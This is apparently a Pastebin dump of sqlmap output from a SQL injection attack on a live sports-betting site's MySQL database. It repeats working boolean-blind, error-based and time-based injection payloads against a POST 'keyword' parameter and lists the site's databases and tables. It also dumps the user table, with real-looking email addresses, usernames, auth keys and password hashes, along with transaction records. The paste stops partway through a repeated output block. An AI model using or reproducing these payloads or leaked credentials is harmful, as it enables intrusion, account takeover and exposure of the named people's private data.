API tools faq
paste
Advertisement
mAsTeR-mInD

Untitled

mAsTeR-mInD
Feb 23rd, 2018
596
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 79.25 KB | None | 0 0
raw download clone embed print report
  1. sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
  2. ---
  3. Place: POST
  4. Parameter: keyword
  5. Type: boolean-based blind
  6. Title: AND boolean-based blind - WHERE or HAVING clause
  7. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  8.  
  9. Type: error-based
  10. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  11. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  12.  
  13. Type: AND/OR time-based blind
  14. Title: MySQL > 5.0.11 AND time-based blind
  15. Payload: keyword=arsenal%' AND SLEEP(10) AND '%'='
  16. ---
  17. web application technology: PHP 5.6.33, Nginx
  18. back-end DBMS: MySQL 5.0
  19. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  20. ---
  21. Place: POST
  22. Parameter: keyword
  23. Type: boolean-based blind
  24. Title: AND boolean-based blind - WHERE or HAVING clause
  25. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  26.  
  27. Type: error-based
  28. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  29. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  30.  
  31. Type: AND/OR time-based blind
  32. Title: MySQL > 5.0.11 AND time-based blind
  33. Payload: keyword=arsenal%' AND SLEEP(10) AND '%'='
  34. ---
  35. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  36. ---
  37. Place: POST
  38. Parameter: keyword
  39. Type: boolean-based blind
  40. Title: AND boolean-based blind - WHERE or HAVING clause
  41. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  42.  
  43. Type: error-based
  44. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  45. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  46.  
  47. Type: AND/OR time-based blind
  48. Title: MySQL > 5.0.11 AND time-based blind
  49. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  50. ---
  51. web application technology: PHP 5.6.33, Nginx
  52. back-end DBMS: MySQL 5.0
  53. available databases [5]:
  54. [*] biko_sport
  55. [*] information_schema
  56. [*] mysql
  57. [*] performance_schema
  58. [*] sys
  59.  
  60. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  61. ---
  62. Place: POST
  63. Parameter: keyword
  64. Type: boolean-based blind
  65. Title: AND boolean-based blind - WHERE or HAVING clause
  66. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  67.  
  68. Type: error-based
  69. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  70. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  71.  
  72. Type: AND/OR time-based blind
  73. Title: MySQL > 5.0.11 AND time-based blind
  74. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  75. ---
  76. web application technology: PHP 5.6.33, Nginx
  77. back-end DBMS: MySQL 5.0
  78. Database: biko_sport
  79. [151 tables]
  80. +--------------------------+
  81. | SEQUENCE |
  82. | match |
  83. | transaction |
  84. | user |
  85. | account_freeze |
  86. | airtel_money |
  87. | airtel_money_rate |
  88. | airtel_subs_blast |
  89. | arch_live_match |
  90. | auth_assignment |
  91. | auth_item |
  92. | auth_item_child |
  93. | auth_rule |
  94. | backup_profile |
  95. | bb |
  96. | bet |
  97. | bet_discount |
  98. | bet_slip |
  99. | bet_slip_check |
  100. | bet_slip_temp |
  101. | bet_status_changes |
  102. | biko_point |
  103. | biko_point_bet |
  104. | biko_point_summary |
  105. | biko_point_trx |
  106. | biko_profile_names |
  107. | bleague_competition |
  108. | bleague_event_odd |
  109. | bleague_match |
  110. | bonus_bet |
  111. | bonus_bet_count |
  112. | bonus_trx |
  113. | card_summary |
  114. | category |
  115. | competition |
  116. | delivery_report |
  117. | early_bet_white_list |
  118. | event |
  119. | event_odd |
  120. | free_bet |
  121. | free_bet_transactions |
  122. | ga |
  123. | game |
  124. | game_ids |
  125. | game_request |
  126. | gr_profile_player |
  127. | gr_tickets |
  128. | inactive2_subs |
  129. | inactive_nums |
  130. | inactive_profile |
  131. | inbox |
  132. | jackpot_bet |
  133. | jackpot_event |
  134. | jackpot_match |
  135. | jackpot_trx |
  136. | jackpot_type |
  137. | jackpot_winner |
  138. | jp_bet_cancel_data |
  139. | jpbonus_award |
  140. | latest_alive |
  141. | live_match |
  142. | live_meta_history |
  143. | live_odds |
  144. | live_odds_change |
  145. | live_odds_meta |
  146. | ls_betmatch |
  147. | ls_card |
  148. | ls_category |
  149. | ls_city |
  150. | ls_country |
  151. | ls_goal |
  152. | ls_line_up |
  153. | ls_livescore_data |
  154. | ls_match_detail |
  155. | ls_player |
  156. | ls_referee |
  157. | ls_scores |
  158. | ls_sport |
  159. | ls_substitution |
  160. | ls_team |
  161. | ls_tournament |
  162. | ls_venue |
  163. | matchid |
  164. | menu |
  165. | migration |
  166. | missed_withdrawals |
  167. | mobile_app_profile |
  168. | mobile_app_version |
  169. | mpesa_rate |
  170. | mpesa_transaction |
  171. | msi |
  172. | mts_exception |
  173. | mts_ticket_submit |
  174. | mts_validation_code |
  175. | network_charge_range |
  176. | nums_pro |
  177. | odd_history |
  178. | odd_key_alias |
  179. | odd_type |
  180. | odds_history |
  181. | odds_subtype |
  182. | outbox |
  183. | outcome |
  184. | outcome_backup |
  185. | outcome_o |
  186. | outcome_old |
  187. | outcome_test |
  188. | outright |
  189. | outright_competitor |
  190. | outright_odd |
  191. | outright_odd_history |
  192. | outright_outcome |
  193. | paybill_tariff |
  194. | playground |
  195. | profile |
  196. | profile_balance |
  197. | profile_bonus |
  198. | profile_setting |
  199. | profile_settings |
  200. | recon_references |
  201. | reconciliation |
  202. | running_balance |
  203. | seven_aggregator_request |
  204. | shop_deposits |
  205. | shop_withdrawals |
  206. | speed_dial_history |
  207. | speed_dial_profile |
  208. | sport |
  209. | sqlmapfile |
  210. | talksport |
  211. | team |
  212. | ticket_settlement |
  213. | tournament |
  214. | traffic_analytic |
  215. | types |
  216. | user_bet_cancel |
  217. | ux_categories |
  218. | ux_todays_highlights |
  219. | virtual_competition |
  220. | virtual_event_odd |
  221. | virtual_latest_alive |
  222. | virtual_match |
  223. | virtual_odd_type |
  224. | virtual_odds |
  225. | virtual_odds_meta |
  226. | virtual_outcome |
  227. | virtual_sport |
  228. | void_bet_slip |
  229. | winner |
  230. | withdraw_references |
  231. | withdrawal |
  232. +--------------------------+
  233.  
  234. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  235. ---
  236. Place: POST
  237. Parameter: keyword
  238. Type: boolean-based blind
  239. Title: AND boolean-based blind - WHERE or HAVING clause
  240. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  241.  
  242. Type: error-based
  243. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  244. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  245.  
  246. Type: AND/OR time-based blind
  247. Title: MySQL > 5.0.11 AND time-based blind
  248. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  249. ---
  250. web application technology: PHP 5.6.33, Nginx
  251. back-end DBMS: MySQL 5.0
  252. Database: biko_sport
  253. Table: user
  254. [9 columns]
  255. +----------------------+-------------+
  256. | Column | Type |
  257. +----------------------+-------------+
  258. | auth_key | text |
  259. | created_at | text |
  260. | email | text |
  261. | id | bigint(20) |
  262. | password_hash | text |
  263. | password_reset_token | text |
  264. | status | varchar(5) |
  265. | updated_at | text |
  266. | username | varchar(20) |
  267. +----------------------+-------------+
  268.  
  269. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  270. ---
  271. Place: POST
  272. Parameter: keyword
  273. Type: boolean-based blind
  274. Title: AND boolean-based blind - WHERE or HAVING clause
  275. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  276.  
  277. Type: error-based
  278. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  279. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  280.  
  281. Type: AND/OR time-based blind
  282. Title: MySQL > 5.0.11 AND time-based blind
  283. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  284. ---
  285. web application technology: PHP 5.6.33, Nginx
  286. back-end DBMS: MySQL 5.0
  287. Database: biko_sport
  288. Table: user
  289. [17 entries]
  290. +----+---------------------------+--------+------------+----------------------------------+---------------------+---------------------+--------------------------------------------------------------+----------------------+
  291. | id | email | status | username | auth_key | created_at | updated_at | password_hash | password_reset_token |
  292. +----+---------------------------+--------+------------+----------------------------------+---------------------+---------------------+--------------------------------------------------------------+----------------------+
  293. | 2 | peter.murwa@gmail.com | 10 | murwa | Q1WUztFcBu4C6yBPak1qpv336aXCPXpE | 1517084792 | 1517084792 | $2y$13$wTNGu/E0Rr4sxdXi4E75E.T7c0SIEtj6OAqVsl5hT5kQrYbUejcD. | NULL |
  294. | 3 | goodhopeh@mobibet.co.tz | 10 | goodhope | 6jus-DVtSsP5jUUaU9T4jESQRddPq805 | 1517228527 | 1517228527 | $2y$13$K2B5BB9lji/TwpBnf5Bu4ea/EKefdMLA5Pfnxd0fzLzKyb3f13hBC | NULL |
  295. | 4 | victori@mobibet.co.tz | 10 | Victor | ZCY0Qo7QRWu-FnMAhC8mXHwCJ9S1s73x | 1517314649 | 1517314649 | $2y$13$mTJz8q5uRNnZNd.cOUawPeFDcC/ho1kS7s94XpMUHIGh1X94KBWZy | NULL |
  296. | 5 | cmgeta@mobibet.co.tz | 10 | Charles | y77Aal55cfYgqiztF_A8yITQMSFzvGpF | 1517323928 | 1517323928 | $2y$13$Czv4bDRJDei.5MhPTCoesOwurEODeeSJbVIvWrRSSTfRBs8Mf4xDa | NULL |
  297. | 6 | geoffrey@mobibet.co.tz | 10 | geoffrey | iLj5z8DLq0o7DSVNK5KTiTXVLlO-zdLw | 1517409882 | 1517409882 | $2y$13$5zMJZayVbPqrQYwKX9lSs.nMiUtvgTn2OaVaSQAwr9tXeadO0ADEa | NULL |
  298. | 10 | rubewafula@gmail.com | 10 | rubewafula | cyR9-jNzFAAlIYu-708Lm6y5ouuUm3tK | 2018-01-26 12:28:36 | 2018-01-26 12:28:36 | $2a$08$R71tyVKLyPrfZuWFYYKlk.Ix0cEq/xW7XFxLvMZ7VQr7iK9BBmVBO | NULL |
  299. | 11 | mwendamseke@ewallet.co.tz | 10 | 0713076547 | RN2l9xGq4O_5X26QjaB8MrH-esA9YfH1 | 1517677955 | 1517677955 | $2y$13$ixnAn4AB8s/XSt6rPOmD6.1UXIr7HCvjjb7PeBHU.mvJMyPjLSz0i | NULL |
  300. | 12 | jmbaga@bikosports.co.tz | 10 | jmbaga | JX7a8CWVeLlfgq0NOUDr9QuxfTbVAtic | 1518081252 | 1518081252 | $2y$13$ZH5363BzdH/Rg4lPbyEvzuE2ZAefYlcAbkYfifFD.rnSxi5PnuqgK | NULL |
  301. | 13 | peter.murwa87@gmail.com | 10 | peter | JqDK5892G1mI7n6M7zNLOApTpE1YsDip | 1518099120 | 1518099120 | $2y$13$oahXpBjBbPKZGqRWtFdNcuVWmyl9xEQx0UyJk3tG8fN/RyQC2FinC | NULL |
  302. | 14 | cc1@bikosports.co.tz | 10 | cc1 | bhe4mtdPvb4zTN55dbrjIFkea8smf3-K | 1518100867 | 1518100867 | $2y$13$1pVlA3z4IcuLT0WZ0lKChOlnO4CnWSw1JkxF9il7HYPjCAxeOZbdW | NULL |
  303. | 15 | achley@bikosports.co.tz | 10 | achley | GjVfsGXmIKGDgUo4Hrv5rpIN1t1CzYro | 1518101951 | 1518101951 | $2y$13$WZhCjLqVYSXDCNv/kPK.POzuvJ14nwahwf6a3yrp13N8awmIAxBHe | NULL |
  304. | 16 | mathias@bikosports.co.tz | 10 | mathias | 8i3kr6BIHXmMG-NvRhrwUAuFF3u_4BSx | 1518102110 | 1518102110 | $2y$13$8Ayw7yxnTW7oAFAgW9CHfujhrce7eeG3SEBBxAVkaRMVbXS1Qqz/q | NULL |
  305. | 17 | mercy@bikosports.co.tz | 10 | mercy | 2_sFyPNsPu56Jok1-eWcek_sA9fkGhXv | 1518102186 | 1518102186 | $2y$13$LAjDQPZewSi07Pmu0/Mq9uwqxjTqaBSWTUyQ4iFreaQU48gG8mdJ6 | NULL |
  306. | 18 | sachko@bikosports.co.tz | 10 | sachko | N1cD-cKN71AMMtSZDgF9dxy9qkIrs53I | 1518164536 | 1518164536 | $2y$13$D9kEdiOML6O7835O.GlZyeKCDDTO5f9KDwIiMW6dqpegH7pWmGb0C | NULL |
  307. | 19 | anicet@bikosports.co.tz | 10 | anicet | 5GGamhS1AxmwNHeKRcfVkJzYRxyECZ5y | 1518164699 | 1518164699 | $2y$13$XpKE7/rxCvDo8vbbCRrEVOqH82cjWYe6qPh6attlwvV9AKoy3.9Ha | NULL |
  308. | 20 | rose4@bikosports.co.tz | 10 | rose4 | F8lzsndqNlbZH9-MyaUjPmI5BbLtiyM8 | 1518164753 | 1518164753 | $2y$13$NhgvuQp.XLHZWfR0hnCfiOYhf68x9gH4kIh/rbGl1lY3qrfgWPH/O | NULL |
  309. | 21 | jngowi26@gmail.com | 10 | joseph | XCK1C7pnACgdLJ-loedJpYf_kjRbKkUi | 1518191463 | 1518191463 | $2y$13$hdvvYQTg.9cxJHR4ZpJGn.x02iYiNqmcX312BM3QsxAhLrHVzk36u | NULL |
  310. +----+---------------------------+--------+------------+----------------------------------+---------------------+---------------------+--------------------------------------------------------------+----------------------+
  311.  
  312. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  313. ---
  314. Place: POST
  315. Parameter: keyword
  316. Type: boolean-based blind
  317. Title: AND boolean-based blind - WHERE or HAVING clause
  318. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  319.  
  320. Type: error-based
  321. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  322. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  323.  
  324. Type: AND/OR time-based blind
  325. Title: MySQL > 5.0.11 AND time-based blind
  326. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  327. ---
  328. web application technology: PHP 5.6.33, Nginx
  329. back-end DBMS: MySQL 5.0
  330. Database: biko_sport
  331. Table: user_bet_cancel
  332. [6 columns]
  333. +------------+--------------+
  334. | Column | Type |
  335. +------------+--------------+
  336. | bet_id | int(11) |
  337. | created | datetime |
  338. | created_by | varchar(255) |
  339. | id | int(11) |
  340. | modified | timestamp |
  341. | status | int(11) |
  342. +------------+--------------+
  343.  
  344. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  345. ---
  346. Place: POST
  347. Parameter: keyword
  348. Type: boolean-based blind
  349. Title: AND boolean-based blind - WHERE or HAVING clause
  350. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  351.  
  352. Type: error-based
  353. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  354. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  355.  
  356. Type: AND/OR time-based blind
  357. Title: MySQL > 5.0.11 AND time-based blind
  358. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  359. ---
  360. web application technology: PHP 5.6.33, Nginx
  361. back-end DBMS: MySQL 5.0
  362. Database: biko_sport
  363. Table: user_bet_cancel
  364. [0 entries]
  365. +----+--------+--------+---------+----------+------------+
  366. | id | bet_id | status | created | modified | created_by |
  367. +----+--------+--------+---------+----------+------------+
  368. +----+--------+--------+---------+----------+------------+
  369.  
  370. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  371. ---
  372. Place: POST
  373. Parameter: keyword
  374. Type: boolean-based blind
  375. Title: AND boolean-based blind - WHERE or HAVING clause
  376. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  377.  
  378. Type: error-based
  379. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  380. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  381.  
  382. Type: AND/OR time-based blind
  383. Title: MySQL > 5.0.11 AND time-based blind
  384. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  385. ---
  386. web application technology: PHP 5.6.33, Nginx
  387. back-end DBMS: MySQL 5.0
  388. Database: biko_sport
  389. Table: transaction
  390. [11 columns]
  391. +-----------------+----------------------------+
  392. | Column | Type |
  393. +-----------------+----------------------------+
  394. | account | varchar(50) |
  395. | amount | decimal(10,0) |
  396. | created | datetime |
  397. | created_by | varchar(60) |
  398. | id | int(11) |
  399. | iscredit | smallint(1) |
  400. | modified | timestamp |
  401. | profile_id | bigint(20) |
  402. | reference | varchar(50) |
  403. | running_balance | decimal(10,2) |
  404. | status | enum('COMPLETE','PENDING') |
  405. +-----------------+----------------------------+
  406.  
  407. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  408. ---
  409. Place: POST
  410. Parameter: keyword
  411. Type: boolean-based blind
  412. Title: AND boolean-based blind - WHERE or HAVING clause
  413. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  414.  
  415. Type: error-based
  416. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  417. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  418.  
  419. Type: AND/OR time-based blind
  420. Title: MySQL > 5.0.11 AND time-based blind
  421. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  422. ---
  423. web application technology: PHP 5.6.33, Nginx
  424. back-end DBMS: MySQL 5.0
  425. Database: biko_sport
  426. Table: transaction
  427. [11 entries]
  428. +------+------------+----------+--------+----------------+---------------------+----------+---------------------+-----------+------------------+-----------------+
  429. | id | profile_id | status | amount | account | created | iscredit | modified | reference | created_by | running_balance |
  430. +------+------------+----------+--------+----------------+---------------------+----------+---------------------+-----------+------------------+-----------------+
  431. | 2793 | 1 | COMPLETE | 1000 | 2265_VIRTUAL | 2018-02-02 19:12:05 | 0 | 2018-02-02 19:12:05 | 1000 | Biko_Q_Processor | NULL |
  432. | 2797 | 1 | COMPLETE | 1000 | [8886]_VIRTUAL | 2018-02-02 19:12:06 | 0 | 2018-02-02 19:12:06 | 10000 | Biko_Q_Processor | NULL |
  433. | 2800 | 1 | COMPLETE | 1000 | 720_VIRTUAL | 2018-02-02 19:12:08 | 0 | 2018-02-02 19:12:08 | 10001 | Biko_Q_Processor | NULL |
  434. | 4847 | 4 | COMPLETE | 500 | [8887]_VIRTUAL | 2018-02-02 19:12:08 | 0 | 2018-02-02 19:12:08 | 10002 | Biko_Q_Processor | NULL |
  435. | 382 | 6 | COMPLETE | 500 | [8888]_VIRTUAL | 2018-02-02 19:12:09 | 0 | 2018-02-02 19:12:09 | 10003 | Biko_Q_Processor | NULL |
  436. | 383 | 6 | COMPLETE | 1000 | 631_VIRTUAL | 2018-02-02 19:12:10 | 0 | 2018-02-02 19:12:10 | 10004 | Biko_Q_Processor | NULL |
  437. | 384 | 6 | COMPLETE | 800 | 2009_VIRTUAL | 2018-02-02 19:12:10 | 0 | 2018-02-02 19:12:10 | 10005 | Biko_Q_Processor | NULL |
  438. | 385 | 6 | COMPLETE | 1000 | [8889]_VIRTUAL | 2018-02-02 19:12:11 | 0 | 2018-02-02 19:12:11 | 10007 | Biko_Q_Processor | NULL |
  439. | 1694 | 6 | COMPLETE | 5000 | 937_VIRTUAL | 2018-02-02 19:32:50 | 0 | 2018-02-02 19:32:50 | 10008 | Biko_Q_Processor | NULL |
  440. | 1920 | 6 | COMPLETE | 500 | 2439_VIRTUAL | 2018-02-02 20:13:00 | 0 | 2018-02-02 20:13:00 | 10009 | Biko_Q_Processor | NULL |
  441. | 1935 | 6 | COMPLETE | 500 | 4257_VIRTUAL | 2018-02-02 20:28:05 | 0 | 2018-02-02 20:28:05 | 1001 | Biko_Q_Processor | NULL |
  442. +------+------------+----------+--------+----------------+---------------------+----------+---------------------+-----------+------------------+-----------------+
  443.  
  444. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  445. ---
  446. Place: POST
  447. Parameter: keyword
  448. Type: boolean-based blind
  449. Title: AND boolean-based blind - WHERE or HAVING clause
  450. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  451.  
  452. Type: error-based
  453. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  454. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  455.  
  456. Type: AND/OR time-based blind
  457. Title: MySQL > 5.0.11 AND time-based blind
  458. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  459. ---
  460. web application technology: PHP 5.6.33, Nginx
  461. back-end DBMS: MySQL 5.0
  462. Database: biko_sport
  463. [151 tables]
  464. +--------------------------+
  465. | SEQUENCE |
  466. | match |
  467. | transaction |
  468. | user |
  469. | account_freeze |
  470. | airtel_money |
  471. | airtel_money_rate |
  472. | airtel_subs_blast |
  473. | arch_live_match |
  474. | auth_assignment |
  475. | auth_item |
  476. | auth_item_child |
  477. | auth_rule |
  478. | backup_profile |
  479. | bb |
  480. | bet |
  481. | bet_discount |
  482. | bet_slip |
  483. | bet_slip_check |
  484. | bet_slip_temp |
  485. | bet_status_changes |
  486. | biko_point |
  487. | biko_point_bet |
  488. | biko_point_summary |
  489. | biko_point_trx |
  490. | biko_profile_names |
  491. | bleague_competition |
  492. | bleague_event_odd |
  493. | bleague_match |
  494. | bonus_bet |
  495. | bonus_bet_count |
  496. | bonus_trx |
  497. | card_summary |
  498. | category |
  499. | competition |
  500. | delivery_report |
  501. | early_bet_white_list |
  502. | event |
  503. | event_odd |
  504. | free_bet |
  505. | free_bet_transactions |
  506. | ga |
  507. | game |
  508. | game_ids |
  509. | game_request |
  510. | gr_profile_player |
  511. | gr_tickets |
  512. | inactive2_subs |
  513. | inactive_nums |
  514. | inactive_profile |
  515. | inbox |
  516. | jackpot_bet |
  517. | jackpot_event |
  518. | jackpot_match |
  519. | jackpot_trx |
  520. | jackpot_type |
  521. | jackpot_winner |
  522. | jp_bet_cancel_data |
  523. | jpbonus_award |
  524. | latest_alive |
  525. | live_match |
  526. | live_meta_history |
  527. | live_odds |
  528. | live_odds_change |
  529. | live_odds_meta |
  530. | ls_betmatch |
  531. | ls_card |
  532. | ls_category |
  533. | ls_city |
  534. | ls_country |
  535. | ls_goal |
  536. | ls_line_up |
  537. | ls_livescore_data |
  538. | ls_match_detail |
  539. | ls_player |
  540. | ls_referee |
  541. | ls_scores |
  542. | ls_sport |
  543. | ls_substitution |
  544. | ls_team |
  545. | ls_tournament |
  546. | ls_venue |
  547. | matchid |
  548. | menu |
  549. | migration |
  550. | missed_withdrawals |
  551. | mobile_app_profile |
  552. | mobile_app_version |
  553. | mpesa_rate |
  554. | mpesa_transaction |
  555. | msi |
  556. | mts_exception |
  557. | mts_ticket_submit |
  558. | mts_validation_code |
  559. | network_charge_range |
  560. | nums_pro |
  561. | odd_history |
  562. | odd_key_alias |
  563. | odd_type |
  564. | odds_history |
  565. | odds_subtype |
  566. | outbox |
  567. | outcome |
  568. | outcome_backup |
  569. | outcome_o |
  570. | outcome_old |
  571. | outcome_test |
  572. | outright |
  573. | outright_competitor |
  574. | outright_odd |
  575. | outright_odd_history |
  576. | outright_outcome |
  577. | paybill_tariff |
  578. | playground |
  579. | profile |
  580. | profile_balance |
  581. | profile_bonus |
  582. | profile_setting |
  583. | profile_settings |
  584. | recon_references |
  585. | reconciliation |
  586. | running_balance |
  587. | seven_aggregator_request |
  588. | shop_deposits |
  589. | shop_withdrawals |
  590. | speed_dial_history |
  591. | speed_dial_profile |
  592. | sport |
  593. | sqlmapfile |
  594. | talksport |
  595. | team |
  596. | ticket_settlement |
  597. | tournament |
  598. | traffic_analytic |
  599. | types |
  600. | user_bet_cancel |
  601. | ux_categories |
  602. | ux_todays_highlights |
  603. | virtual_competition |
  604. | virtual_event_odd |
  605. | virtual_latest_alive |
  606. | virtual_match |
  607. | virtual_odd_type |
  608. | virtual_odds |
  609. | virtual_odds_meta |
  610. | virtual_outcome |
  611. | virtual_sport |
  612. | void_bet_slip |
  613. | winner |
  614. | withdraw_references |
  615. | withdrawal |
  616. +--------------------------+
  617.  
  618. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  619. ---
  620. Place: POST
  621. Parameter: keyword
  622. Type: boolean-based blind
  623. Title: AND boolean-based blind - WHERE or HAVING clause
  624. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  625.  
  626. Type: error-based
  627. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  628. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  629.  
  630. Type: AND/OR time-based blind
  631. Title: MySQL > 5.0.11 AND time-based blind
  632. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  633. ---
  634. web application technology: PHP 5.6.33, Nginx
  635. back-end DBMS: MySQL 5.0
  636. Database: biko_sport
  637. Table: profile
  638. [7 columns]
  639. +------------+-------------+
  640. | Column | Type |
  641. +------------+-------------+
  642. | created | datetime |
  643. | created_by | varchar(45) |
  644. | modified | timestamp |
  645. | msisdn | varchar(45) |
  646. | network | varchar(50) |
  647. | profile_id | bigint(20) |
  648. | status | smallint(1) |
  649. +------------+-------------+
  650.  
  651. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  652. ---
  653. Place: POST
  654. Parameter: keyword
  655. Type: boolean-based blind
  656. Title: AND boolean-based blind - WHERE or HAVING clause
  657. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  658.  
  659. Type: error-based
  660. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  661. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  662.  
  663. Type: AND/OR time-based blind
  664. Title: MySQL > 5.0.11 AND time-based blind
  665. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  666. ---
  667. web application technology: PHP 5.6.33, Nginx
  668. back-end DBMS: MySQL 5.0
  669. Database: biko_sport
  670. Table: profile_balance
  671. [7 columns]
  672. +--------------------+---------------+
  673. | Column | Type |
  674. +--------------------+---------------+
  675. | balance | decimal(10,2) |
  676. | bonus_balance | decimal(10,2) |
  677. | created | datetime |
  678. | modified | timestamp |
  679. | profile_balance_id | int(10) |
  680. | profile_id | bigint(20) |
  681. | transaction_id | bigint(20) |
  682. +--------------------+---------------+
  683.  
  684. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  685. ---
  686. Place: POST
  687. Parameter: keyword
  688. Type: boolean-based blind
